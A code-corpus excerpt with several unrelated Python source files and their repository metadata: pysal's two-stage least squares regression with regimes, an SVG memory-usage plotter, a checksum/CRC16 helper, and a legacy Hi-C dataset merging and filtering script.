        for _ in self.computation_decl.exop_block:
            line_count += 1
        height = line_count * line_spacing + stroke_width
        # max(1, ...) guards the divisions below against a zero footprint.
        memory_footprint = max(1, float(self.computation_decl.exop_block.memory_footprint()))
        file.write('<svg viewBox="0 0 {} {}">\n'.format(width, height))
        y = 0
        for i, node in enumerate(self.computation_decl.exop_block):
            usage = float(node.memory_usage())
            footprint = float(node.memory_footprint())
            y += line_spacing
            x1 = offset
            x2 = ((usage / memory_footprint) * scale) + offset
            file.write('<text x="{}" y="{}" fill="{}">{}</text>\n'.format(
                0, y + text_offset, "black", node.name
            ))
            file.write('<line x1="{}" y1="{}" x2="{}" y2="{}"'
                       ' style="stroke:{};stroke-width:{}" />\n'
                       .format(x1, y, x2, y, "forestgreen", stroke_width))
            x1 = x2
            x2 = ((footprint / memory_footprint) * scale) + offset
            file.write('<line x1="{}" y1="{}" x2="{}" y2="{}"'
                       ' style="stroke:{};stroke-width:{}" />\n'
                       .format(x1, y, x2, y, "firebrick", stroke_width))
        file.write('</svg>\n')

    def draw_op_influence(self, file):
        """Write a table of every op and its influence (net temporary bytes
        allocated minus freed by the op)."""
        file.write('<table>\n')
        file.write(' <tr>')
        file.write('<th align="left">op</th>')
        file.write('<th align="right">influence</th>')
        file.write('</tr>\n')
        # Bug fix: iterate exop_block (as every other method here does);
        # the previous code iterated a nonexistent 'exop' attribute.
        for exop in self.computation_decl.exop_block:
            weight = self.compute_op_weight(exop)
            file.write(' <tr>')
            file.write('<td>{}</td>'.format(exop.name))
            file.write('<td align="right">{:,}</td>'.format(weight))
            file.write('</tr>\n')
        # Bug fix: the table element was never closed.
        file.write('</table>\n')

    def compute_op_weight(self, exop):
        """Return the net change in temporary-tensor bytes caused by *exop*:
        sizes of non-persistent tensors it allocates minus those it frees."""
        mass = 0
        for tensor in exop.liveness_new_list:
            if tensor.is_persistent is False:
                mass += tensor.size
        for tensor in exop.liveness_free_list:
            if tensor.is_persistent is False:
                mass -= tensor.size
        return mass
| 42.576531 | 97 | 0.520791 |
8505f51b6d6b623ee272452971cb64640edc4996 | 23,199 | py | Python | pysal/model/spreg/twosls_regimes.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | 1 | 2021-08-16T02:47:35.000Z | 2021-08-16T02:47:35.000Z | pysal/model/spreg/twosls_regimes.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | null | null | null | pysal/model/spreg/twosls_regimes.py | ocefpaf/pysal | 7e397bdb4c22d4e2442b4ee88bcd691d2421651d | [
"BSD-3-Clause"
] | 1 | 2016-11-11T19:20:51.000Z | 2016-11-11T19:20:51.000Z | import numpy as np
from . import regimes as REGI
from . import user_output as USER
import multiprocessing as mp
import scipy.sparse as SP
from .utils import sphstack, set_warn, RegressionProps_basic, spdot, sphstack
from .twosls import BaseTSLS
from .robust import hac_multi
from . import summary_output as SUMMARY
from platform import system
"""
Two-stage Least Squares estimation with regimes.
"""
__author__ = "Luc Anselin luc.anselin@asu.edu, Pedro V. Amaral pedro.amaral@asu.edu, David C. Folch david.folch@asu.edu"
class TSLS_Regimes(BaseTSLS, REGI.Regimes_Frame):
"""
Two stage least squares (2SLS) with regimes
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
q : array
Two dimensional array with n rows and one column for each
external exogenous variable to use as instruments (note:
this should not contain any variables from x)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: ['one', 'many']
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime (default)
cols2regi : list, 'all'
Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all' (default), all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
robust : string
If 'white', then a White consistent estimator of the
variance-covariance matrix is given.
If 'hac', then a HAC consistent estimator of the
variance-covariance matrix is given.
If 'ogmm', then Optimal GMM is used to estimate
betas and the variance-covariance matrix.
Default set to None.
gwk : pysal W object
Kernel spatial weights needed for HAC estimation. Note:
matrix must have ones along the main diagonal.
sig2n_k : boolean
If True, then use n-k to estimate sigma^2. If False, use n.
vm : boolean
If True, include variance-covariance matrix in summary
cores : boolean
Specifies if multiprocessing is to be used
Default: no multiprocessing, cores = False
Note: Multiprocessing may not work on all platforms.
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
Attributes
----------
betas : array
kx1 array of estimated coefficients
u : array
nx1 array of residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
q : array
Two dimensional array with n rows and one column for each
external exogenous variable used as instruments
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
vm : array
Variance covariance matrix (kxk)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: [False, 'one', 'many']
Ignored if regimes=False. Constant option for regimes.
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime
cols2regi : list, 'all'
Ignored if regimes=False. Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all', all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
kr : int
Number of variables/columns to be "regimized" or subject
to change by regime. These will result in one parameter
estimate by regime for each variable (i.e. nr parameters per
variable)
kf : int
Number of variables/columns to be considered fixed or
global across regimes and hence only obtain one parameter
estimate
nr : int
Number of different regimes in the 'regimes' list
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
multi : dictionary
Only available when multiple regressions are estimated,
i.e. when regime_err_sep=True and no variable is fixed
across regimes.
Contains all attributes of each individual regression
Examples
--------
We first need to import the needed modules, namely numpy to convert the
data we read into arrays that ``spreg`` understands and ``pysal`` to
perform all the analysis.
>>> import numpy as np
>>> import pysal.lib
Open data on NCOVR US County Homicides (3085 areas) using pysal.lib.io.open().
This is the DBF associated with the NAT shapefile. Note that
pysal.lib.io.open() also reads data in CSV format; since the actual class
requires data to be passed in as numpy arrays, the user can read their
data in using any method.
>>> db = pysal.lib.io.open(pysal.lib.examples.get_path("NAT.dbf"),'r')
Extract the HR90 column (homicide rates in 1990) from the DBF file and make it the
dependent variable for the regression. Note that PySAL requires this to be
an numpy array of shape (n, 1) as opposed to the also common shape of (n, )
that other packages accept.
>>> y_var = 'HR90'
>>> y = np.array([db.by_col(y_var)]).reshape(3085,1)
Extract UE90 (unemployment rate) and PS90 (population structure) vectors from
the DBF to be used as independent variables in the regression. Other variables
can be inserted by adding their names to x_var, such as x_var = ['Var1','Var2','...]
Note that PySAL requires this to be an nxj numpy array, where j is the
number of independent variables (not including a constant). By default
this model adds a vector of ones to the independent variables passed in.
>>> x_var = ['PS90','UE90']
>>> x = np.array([db.by_col(name) for name in x_var]).T
In this case we consider RD90 (resource deprivation) as an endogenous regressor.
We tell the model that this is so by passing it in a different parameter
from the exogenous variables (x).
>>> yd_var = ['RD90']
>>> yd = np.array([db.by_col(name) for name in yd_var]).T
Because we have endogenous variables, to obtain a correct estimate of the
model, we need to instrument for RD90. We use FP89 (families below poverty)
for this and hence put it in the instruments parameter, 'q'.
>>> q_var = ['FP89']
>>> q = np.array([db.by_col(name) for name in q_var]).T
The different regimes in this data are given according to the North and
South dummy (SOUTH).
>>> r_var = 'SOUTH'
>>> regimes = db.by_col(r_var)
Since we want to perform tests for spatial dependence, we need to specify
the spatial weights matrix that includes the spatial configuration of the
observations into the error component of the model. To do that, we can open
an already existing gal file or create a new one. In this case, we will
create one from ``NAT.shp``.
>>> w = pysal.lib.weights.Rook.from_shapefile(pysal.lib.examples.get_path("NAT.shp"))
Unless there is a good reason not to do it, the weights have to be
row-standardized so every row of the matrix sums to one. Among other
things, this allows to interpret the spatial lag of a variable as the
average value of the neighboring observations. In PySAL, this can be
easily performed in the following way:
>>> w.transform = 'r'
We can now run the regression and then have a summary of the output
by typing: model.summary
Alternatively, we can just check the betas and standard errors of the
parameters:
>>> tslsr = TSLS_Regimes(y, x, yd, q, regimes, w=w, constant_regi='many', spat_diag=False, name_y=y_var, name_x=x_var, name_yend=yd_var, name_q=q_var, name_regimes=r_var, name_ds='NAT', name_w='NAT.shp')
>>> tslsr.betas
array([[ 3.66973562],
[ 1.06950466],
[ 0.14680946],
[ 2.45864196],
[ 9.55873243],
[ 1.94666348],
[-0.30810214],
[ 3.68718119]])
>>> np.sqrt(tslsr.vm.diagonal())
array([ 0.38389901, 0.09963973, 0.04672091, 0.22725012, 0.49181223,
0.19630774, 0.07784587, 0.25529011])
"""
def __init__(self, y, x, yend, q, regimes,
w=None, robust=None, gwk=None, sig2n_k=True,
spat_diag=False, vm=False, constant_regi='many',
cols2regi='all', regime_err_sep=True, name_y=None, name_x=None,
cores=False, name_yend=None, name_q=None, name_regimes=None,
name_w=None, name_gwk=None, name_ds=None, summ=True):
n = USER.check_arrays(y, x)
USER.check_y(y, n)
USER.check_weights(w, y)
USER.check_robust(robust, gwk)
USER.check_spat_diag(spat_diag, w)
self.constant_regi = constant_regi
self.cols2regi = cols2regi
self.name_ds = USER.set_name_ds(name_ds)
self.name_regimes = USER.set_name_ds(name_regimes)
self.name_w = USER.set_name_w(name_w, w)
self.name_gwk = USER.set_name_w(name_gwk, gwk)
self.name_y = USER.set_name_y(name_y)
name_yend = USER.set_name_yend(name_yend, yend)
name_q = USER.set_name_q(name_q, q)
self.name_x_r = USER.set_name_x(name_x, x) + name_yend
self.n = n
cols2regi = REGI.check_cols2regi(
constant_regi, cols2regi, x, yend=yend, add_cons=False)
self.regimes_set = REGI._get_regimes_set(regimes)
self.regimes = regimes
USER.check_regimes(self.regimes_set, self.n, x.shape[1])
if regime_err_sep == True and robust == 'hac':
set_warn(
self, "Error by regimes is incompatible with HAC estimation for 2SLS models. Hence, the error by regimes has been disabled for this model.")
regime_err_sep = False
self.regime_err_sep = regime_err_sep
if regime_err_sep == True and set(cols2regi) == set([True]) and constant_regi == 'many':
name_x = USER.set_name_x(name_x, x)
self.y = y
regi_ids = dict(
(r, list(np.where(np.array(regimes) == r)[0])) for r in self.regimes_set)
self._tsls_regimes_multi(x, yend, q, w, regi_ids, cores,
gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q)
else:
name_x = USER.set_name_x(name_x, x, constant=True)
q, self.name_q = REGI.Regimes_Frame.__init__(self, q,
regimes, constant_regi=None, cols2regi='all', names=name_q)
x, self.name_x = REGI.Regimes_Frame.__init__(self, x,
regimes, constant_regi, cols2regi=cols2regi, names=name_x)
yend, self.name_yend = REGI.Regimes_Frame.__init__(self, yend,
regimes, constant_regi=None,
cols2regi=cols2regi, yend=True, names=name_yend)
if regime_err_sep == True and robust == None:
robust = 'white'
BaseTSLS.__init__(self, y=y, x=x, yend=yend, q=q,
robust=robust, gwk=gwk, sig2n_k=sig2n_k)
self.title = "TWO STAGE LEAST SQUARES - REGIMES"
if robust == 'ogmm':
_optimal_weight(self, sig2n_k)
self.name_z = self.name_x + self.name_yend
self.name_h = USER.set_name_h(self.name_x, self.name_q)
self.chow = REGI.Chow(self)
self.robust = USER.set_robust(robust)
if summ:
SUMMARY.TSLS(
reg=self, vm=vm, w=w, spat_diag=spat_diag, regimes=True)
def _tsls_regimes_multi(self, x, yend, q, w, regi_ids, cores,
gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q):
results_p = {}
"""
for r in self.regimes_set:
if system() != 'Windows':
is_win = True
results_p[r] = _work(*(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
else:
pool = mp.Pool(cores)
results_p[r] = pool.apply_async(_work,args=(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
is_win = False
"""
for r in self.regimes_set:
if cores:
pool = mp.Pool(None)
results_p[r] = pool.apply_async(_work, args=(
self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k, self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
else:
results_p[r] = _work(*(self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k,
self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
self.kryd = 0
self.kr = x.shape[1] + yend.shape[1] + 1
self.kf = 0
self.nr = len(self.regimes_set)
self.vm = np.zeros((self.nr * self.kr, self.nr * self.kr), float)
self.betas = np.zeros((self.nr * self.kr, 1), float)
self.u = np.zeros((self.n, 1), float)
self.predy = np.zeros((self.n, 1), float)
"""
if not is_win:
pool.close()
pool.join()
"""
if cores:
pool.close()
pool.join()
results = {}
self.name_y, self.name_x, self.name_yend, self.name_q, self.name_z, self.name_h = [
], [], [], [], [], []
counter = 0
for r in self.regimes_set:
"""
if is_win:
results[r] = results_p[r]
else:
results[r] = results_p[r].get()
"""
if not cores:
results[r] = results_p[r]
else:
results[r] = results_p[r].get()
self.vm[(counter * self.kr):((counter + 1) * self.kr),
(counter * self.kr):((counter + 1) * self.kr)] = results[r].vm
self.betas[
(counter * self.kr):((counter + 1) * self.kr), ] = results[r].betas
self.u[regi_ids[r], ] = results[r].u
self.predy[regi_ids[r], ] = results[r].predy
self.name_y += results[r].name_y
self.name_x += results[r].name_x
self.name_yend += results[r].name_yend
self.name_q += results[r].name_q
self.name_z += results[r].name_z
self.name_h += results[r].name_h
counter += 1
self.multi = results
self.hac_var = sphstack(x, q)
if robust == 'hac':
hac_multi(self, gwk)
if robust == 'ogmm':
set_warn(
self, "Residuals treated as homoskedastic for the purpose of diagnostics.")
self.chow = REGI.Chow(self)
if spat_diag:
self._get_spat_diag_props(results, regi_ids, x, yend, q)
SUMMARY.TSLS_multi(
reg=self, multireg=self.multi, vm=vm, spat_diag=spat_diag, regimes=True, w=w)
def _get_spat_diag_props(self, results, regi_ids, x, yend, q):
self._cache = {}
x = USER.check_constant(x)
x = REGI.regimeX_setup(
x, self.regimes, [True] * x.shape[1], self.regimes_set)
self.z = sphstack(x, REGI.regimeX_setup(
yend, self.regimes, [True] * yend.shape[1], self.regimes_set))
self.h = sphstack(
x, REGI.regimeX_setup(q, self.regimes, [True] * q.shape[1], self.regimes_set))
hthi = np.linalg.inv(spdot(self.h.T, self.h))
zth = spdot(self.z.T, self.h)
self.varb = np.linalg.inv(spdot(spdot(zth, hthi), zth.T))
def _work(y, x, w, regi_ids, r, yend, q, robust, sig2n_k, name_ds, name_y, name_x, name_yend, name_q, name_w, name_regimes):
    """Fit a single-regime 2SLS model on the subset of observations that
    belong to regime *r* and return the fitted BaseTSLS object, with
    regime-prefixed variable names attached for reporting.

    Module-level (not a method) so it can be pickled for multiprocessing.
    """
    # Subset every input to the rows belonging to regime r.
    y_r = y[regi_ids[r]]
    x_r = x[regi_ids[r]]
    yend_r = yend[regi_ids[r]]
    q_r = q[regi_ids[r]]
    x_constant = USER.check_constant(x_r)
    # HAC and optimal-GMM corrections are applied after estimation, so the
    # base regression itself runs without a robust correction in those cases.
    if robust == 'hac' or robust == 'ogmm':
        robust2 = None
    else:
        robust2 = robust
    model = BaseTSLS(
        y_r, x_constant, yend_r, q_r, robust=robust2, sig2n_k=sig2n_k)
    model.title = "TWO STAGE LEAST SQUARES ESTIMATION - REGIME %s" % r
    if robust == 'ogmm':
        _optimal_weight(model, sig2n_k, warn=False)
    model.robust = USER.set_robust(robust)
    model.name_ds = name_ds
    # Prefix every variable name with the regime label for the summary.
    model.name_y = '%s_%s' % (str(r), name_y)
    model.name_x = ['%s_%s' % (str(r), i) for i in name_x]
    model.name_yend = ['%s_%s' % (str(r), i) for i in name_yend]
    model.name_z = model.name_x + model.name_yend
    model.name_q = ['%s_%s' % (str(r), i) for i in name_q]
    model.name_h = model.name_x + model.name_q
    model.name_w = name_w
    model.name_regimes = name_regimes
    if w:
        # Restrict the weights matrix to regime r (re-standardized).
        w_r, warn = REGI.w_regime(w, regi_ids[r], r, transform=True)
        set_warn(model, warn)
        model.w = w_r
    return model
def _optimal_weight(reg, sig2n_k, warn=True):
    """Re-estimate *reg* in place with optimal-weighted GMM.

    Uses the heteroskedasticity-consistent moment covariance S to build the
    optimal weighting matrix, recomputes betas and vm, and updates *reg*
    via RegressionProps_basic.  When *warn* is True, a note about the
    diagnostics is attached to the results object.
    """
    # reg.h is either a scipy sparse matrix (has .toarray()) or a dense
    # ndarray; previously a bare `except:` hid any other failure here.
    try:
        Hu = reg.h.toarray() * reg.u ** 2
    except AttributeError:
        Hu = reg.h * reg.u ** 2
    # S = H' diag(u^2) H / (n - k)  (or / n when sig2n_k is False).
    if sig2n_k:
        S = spdot(reg.h.T, Hu, array_out=True) / (reg.n - reg.k)
    else:
        S = spdot(reg.h.T, Hu, array_out=True) / reg.n
    Si = np.linalg.inv(S)
    ZtH = spdot(reg.z.T, reg.h)
    ZtHSi = spdot(ZtH, Si)
    # betas = (Z'H S^-1 H'Z)^-1 Z'H S^-1 H'y
    fac2 = np.linalg.inv(spdot(ZtHSi, ZtH.T, array_out=True))
    fac3 = spdot(ZtHSi, spdot(reg.h.T, reg.y), array_out=True)
    betas = np.dot(fac2, fac3)
    if sig2n_k:
        vm = fac2 * (reg.n - reg.k)
    else:
        vm = fac2 * reg.n
    RegressionProps_basic(reg, betas=betas, vm=vm, sig2=False)
    reg.title += " (Optimal-Weighted GMM)"
    if warn:
        set_warn(
            reg, "Residuals treated as homoskedastic for the purpose of diagnostics.")
    return
def _test():
import doctest
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
doctest.testmod()
np.set_printoptions(suppress=start_suppress)
if __name__ == '__main__':
    _test()

    # Demo run on the NAT example dataset.  Kept under the __main__ guard so
    # importing this module no longer reads data files and fits a regression
    # as an import-time side effect (the demo previously ran on import).
    import numpy as np
    import pysal.lib

    db = pysal.lib.io.open(pysal.lib.examples.get_path('NAT.dbf'), 'r')
    y_var = 'HR60'
    y = np.array([db.by_col(y_var)]).T
    x_var = ['PS60', 'DV60', 'RD60']
    x = np.array([db.by_col(name) for name in x_var]).T
    yd_var = ['UE60']
    yd = np.array([db.by_col(name) for name in yd_var]).T
    q_var = ['FP59', 'MA60']
    q = np.array([db.by_col(name) for name in q_var]).T
    r_var = 'SOUTH'
    regimes = db.by_col(r_var)

    tslsr = TSLS_Regimes(y, x, yd, q, regimes, constant_regi='many',
                         spat_diag=False, name_y=y_var, name_x=x_var,
                         name_yend=yd_var, name_q=q_var, name_regimes=r_var,
                         cols2regi=[False, True, True, True],
                         sig2n_k=False)
    print(tslsr.summary)
| 44.959302 | 207 | 0.579766 |
2fcc71ca9e1a206bf5dca1a1b7d486275dcd7bbd | 299 | py | Python | adf2dms/checksum.py | dlitz/adf2dms | 8adfe6acfdc9f18f3627e04eb1d1f798c112f3da | [
"MIT"
] | null | null | null | adf2dms/checksum.py | dlitz/adf2dms | 8adfe6acfdc9f18f3627e04eb1d1f798c112f3da | [
"MIT"
] | null | null | null | adf2dms/checksum.py | dlitz/adf2dms | 8adfe6acfdc9f18f3627e04eb1d1f798c112f3da | [
"MIT"
] | null | null | null | # dlitz 2022
from crccheck.crc import Crc16Arc as _Crc16Arc
def checksum(data):
it = iter(data)
result = 0
while True:
try:
a = next(it)
except StopIteration:
break
result = (result + a) & 0xffff
return result
# CRC-16/ARC (the classic "CRC-16") over a byte sequence, delegated to crccheck.
crc16 = _Crc16Arc.calc
| 18.6875 | 46 | 0.578595 |
8a3323862505d83dabe3b974d634f1d8a4ce2c38 | 7,986 | py | Python | examples/filteringManyDatasets/mergeDatasets2011.py | mirnylab/hiclib-legacy | 518546e41987dca8a40f45ddc63601a5aaf46bfa | [
"MIT"
] | 10 | 2020-02-18T04:23:47.000Z | 2022-03-21T05:15:45.000Z | examples/filteringManyDatasets/mergeDatasets2011.py | mirnylab/hiclib-legacy | 518546e41987dca8a40f45ddc63601a5aaf46bfa | [
"MIT"
] | 1 | 2020-03-03T09:26:40.000Z | 2020-06-23T12:36:00.000Z | examples/filteringManyDatasets/mergeDatasets2011.py | mirnylab/hiclib-legacy | 518546e41987dca8a40f45ddc63601a5aaf46bfa | [
"MIT"
] | 3 | 2020-08-15T13:49:09.000Z | 2021-01-20T02:27:00.000Z | """
.. note::
This is the old version of the script from 2011
This example script does the following:
-Loads individual files from the location defined by source(ID)
-Parses individual files in memory (inMemory = True in "for onename in in_files))
-If your system does not have enough memory, you might need to switch to hdf5 here.
-Merges files corresponding to the same experiment together, on the HDD.
-Filters datasets, builds heatmaps
-Combines multiple replicas of the same experiment together, builds heatmaps
--Locations of individual files are defined by source(ID) function.
--Datasets are defined in the datasets.tsv file
--genome is defined by genomeFolder function, and workingGenome identifier
--output files are arranged to folders named by their workingGenome IDs
Warnings:
Running this over NFS might cause unexpected slow-downs because NFS is
unhappy with repeated read/write cycles to the same file
You could do entire thing in memory, if you have RAM or your datasets are small.
Actually, using HDF5 is then equivalent to storing compressed data in RAM,
and might be in fact pretty fast.
"""
from hiclib.fragmentHiC import HiCdataset
import os
def genomeFolder(name):
    """Return the on-disk genome folder for the genome called *name*."""
    base = "/home/magus/HiC2011/data"
    return os.path.join(base, name)
def source(ID):
    """Map a dataset ID to the path of its mapped-read file.

    The current pipeline stores files under the ID itself, so the ID is
    returned unchanged.  (A hard-coded ``/net/tamm/...fastq.hdf5`` path
    used to follow the ``return`` statement and could never execute; that
    dead line has been removed.)
    """
    return ID
def refineDataset(filenames, create=True, delete=True, parseInMemory=True):
    """
    Parse, merge, filter and heatmap one Hi-C experiment (Python 2 script).

    Parameters
    ----------
    filenames[0] is a list of filenames of incoming files
    filenames[1] is a folder for outgoing file
    filenames[2] is a working genome name, which is also the name of output directory
    create : bool, optional
        If True, parse each file.
        If False, assume that files were already parsed
        (e.g. if you are just playing around with filtering parameters)
    delete : bool, optional
        If True, delete parsed files after merging.
        Man, these files may be huge... if you don't have a 10TB RAID, this may be useful.
    parseInMemory : bool, optional
        Perform parsing input files in memory.
    """
    in_files = filenames[0]
    out_file = filenames[1]
    workingGenome = filenames[2]
    # Output files are grouped into one directory per working genome.
    if os.path.exists(workingGenome) == False:
        try:
            os.mkdir(workingGenome)
        except:
            print "Cannot create working directory"
            exit()
    if create == True:  # if we need to parse the input files (.hdf5 from mapping)
        for onename in in_files:
            # Parse each mapped-read file individually.
            if not os.path.exists(source(onename)):
                raise StandardError("path not found: %s" % onename)
            if parseInMemory == True:
                # Create dataset in memory, parse, then save to destination.
                TR = HiCdataset("bla", genome=genomeFolder(workingGenome),
                                maximumMoleculeLength=500, override=True,
                                inMemory=True)  # remove inMemory if you don't have enough RAM
                TR.parseInputData(dictLike=source(onename))
                TR.save(onename + "_parsed.frag")
            else:
                # Create dataset at destination, parse on HDD; no separate save needed.
                TR = HiCdataset(onename + "_parsed.frag",
                                genome=genomeFolder(workingGenome),
                                maximumMoleculeLength=500, override=True)
                TR.parseInputData(dictLike=source(onename))
        "Merging files alltogether, applying filters"
        TR = HiCdataset(out_file + "_merged.frag",
                        genome=genomeFolder(workingGenome),
                        override=True)
        TR.merge([i + "_parsed.frag" for i in in_files])
        # Merge in all parsed files from one experiment.
        if delete == True:  # clean up the per-file parsed intermediates
            for delFile in [i + "_parsed.frag" for i in in_files]:
                os.remove(delFile)
        TR.flush()
        "Now opening new dataset for refined data, and performing all the filtering "
        TR = HiCdataset(out_file + "_refined.frag",
                        genome=genomeFolder(workingGenome),
                        override=True)
        TR.load(out_file + "_merged.frag")
        #----------------------------Set of filters applied -------------
        TR.filterRsiteStart(offset=5)
        TR.filterDuplicates()
        #TR.save(out_file+".dat")
        TR.filterLarge()
        TR.filterExtreme(cutH=0.005, cutL=0)
        #------------------------End set of filters applied----------
    else:
        # Merging & filtering were already done; just load the refined data.
        TR = HiCdataset(out_file + "_working.frag",
                        override=True, genome=genomeFolder(workingGenome))
        TR.load(out_file + "_refined.frag")
    print "----->Building Raw heatmap at two resolutions"
    TR.printStats()
    TR.saveHeatmap(out_file + "-200k.hm", 200000)
    TR.saveHeatmap(out_file + "-500k.hm", 500000)
    TR.saveHeatmap(out_file + "-1M.hm", 1000000)
    TR.saveHeatmap(out_file + "-2M.hm", 2000000)
    print "----->Building RB heatmap"
    # Keep only double-sided reads farther than maximumMoleculeLength from
    # the restriction site on either side ("breaks" heatmap).
    TR = HiCdataset(out_file + "_breaks.frag", genome=genomeFolder(
        workingGenome), override=True)
    TR.load(out_file + "_refined.frag")
    TR.maskFilter((TR.dists1 > TR.maximumMoleculeLength) + (TR.dists2 >
                  TR.maximumMoleculeLength) * TR.DS)
    TR.printStats()
    TR.saveHeatmap(out_file + "-200k-breaks.hm", 200000)
    TR.saveHeatmap(out_file + "-500k-breaks.hm", 500000)
    TR.saveHeatmap(out_file + "-1M-breaks.hm", 1000000)
    TR.saveHeatmap(out_file + "-2M-breaks.hm", 2000000)
# Parse datasets.tsv: each non-comment row is
#   <file ID> <experiment name> <replica> <working genome>
dataFiles = open("datasets.tsv").readlines()
dataFiles = [i.split() for i in dataFiles if (len(i) > 3) and (i[0] != "#")]
assert False not in [len(i) == 4 for i in dataFiles]
# One "experiment" is the unique (name, replica, genome) triple.
experimentNames = set((i[1], i[2], i[3]) for i in dataFiles)
byExperiment = []
newExperimentNames = []
for experiment in experimentNames:
    # experiment is (name, replica, genome); output goes to <genome>/<name>-<replica>
    workingGenome = experiment[2]
    filenames = [i[0] for i in dataFiles if (i[1], i[2], i[3]) == experiment]
    outName = str(experiment[0]) + "-" + str(experiment[1])
    byExperiment.append(
        (filenames, os.path.join(workingGenome, outName), workingGenome))
    newExperimentNames.append((experiment[0], os.path.join(
        workingGenome, outName), workingGenome))

# Run refineDataset (parse, merge, filter, heatmap) for each experiment.
for i in byExperiment:
    refineDataset(i, create=True, delete=True)

# Merge replicas of the same experiment together (per genome) and build
# combined heatmaps; skipped when an experiment has a single replica.
experiments = set([(i[0], i[2]) for i in newExperimentNames])

for experiment in experiments:
    workingGenome = experiment[1]
    myExperimentNames = [i[1] + "_refined.frag" for i in newExperimentNames if i[0] == experiment[0]]
    assert len(myExperimentNames) > 0
    if len(myExperimentNames) > 1:
        TR = HiCdataset(os.path.join(workingGenome, "%s-all_refined.frag" %
                                     experiment[0]), genome=genomeFolder(workingGenome))
        TR.merge(myExperimentNames)
        TR.saveHeatmap(os.path.join(
            workingGenome, "%s-all-100k.hm" % experiment[0]), 100000)
        TR.saveHeatmap(os.path.join(
            workingGenome, "%s-all-200k.hm" % experiment[0]), 200000)
        TR.saveHeatmap(os.path.join(
            workingGenome, "%s-all-500k.hm" % experiment[0]), 500000)
        TR.saveHeatmap(os.path.join(
            workingGenome, "%s-all-1M.hm" % experiment[0]), 1000000)
#map(refine_paper,
# [((source("SRR027961"),
# source("SRR027960")), os.path.join(workingGenome, "GM-NcoI-%s" % workingGenome ),"NcoI"),
# ((source("SRR027956"),
# source("SRR027957"),
# source("SRR027958"),
# source("SRR027959")), os.path.join(workingGenome, "GM-HindIII-%s" % workingGenome ),"HindIII")])
| 40.538071 | 106 | 0.63436 |
692f93693a695e57f405ee61f591df02db301a20 | 363 | py | Python | GettingAyah.py | Shalash96/PyQuran | da893b73779a342caae0defc8398e27e5744ff7d | [
"MIT"
] | 2 | 2020-09-27T22:42:42.000Z | 2020-10-02T18:50:29.000Z | GettingAyah.py | Shalash96/PyQuran | da893b73779a342caae0defc8398e27e5744ff7d | [
"MIT"
] | null | null | null | GettingAyah.py | Shalash96/PyQuran | da893b73779a342caae0defc8398e27e5744ff7d | [
"MIT"
] | null | null | null | import requests
import random
def GettingAyah():
"""The code used to get an Ayah from the Quran every fixed time"""
while True:
ayah = random.randint(1, 6237)
url = f'http://api.alquran.cloud/v1/ayah/{ayah}'
res = requests.get(url)
if len(res.json()['data']['text']) <= 280:
return res.json()['data']['text']
| 27.923077 | 70 | 0.586777 |
819681fd8494bd65670754e92c213d966a15c5ef | 2,856 | py | Python | docs/source/sphinxext/refactordoc/line_functions.py | mmckerns/enaml | ebf417b4dce9132bffa038a588ad90436a59d37e | [
"BSD-3-Clause"
] | 11 | 2015-03-14T14:30:51.000Z | 2022-03-15T13:01:44.000Z | docs/source/sphinxext/refactordoc/line_functions.py | mmckerns/enaml | ebf417b4dce9132bffa038a588ad90436a59d37e | [
"BSD-3-Clause"
] | 36 | 2015-02-20T00:56:53.000Z | 2020-12-04T10:02:14.000Z | docs/source/sphinxext/refactordoc/line_functions.py | mmckerns/enaml | ebf417b4dce9132bffa038a588ad90436a59d37e | [
"BSD-3-Clause"
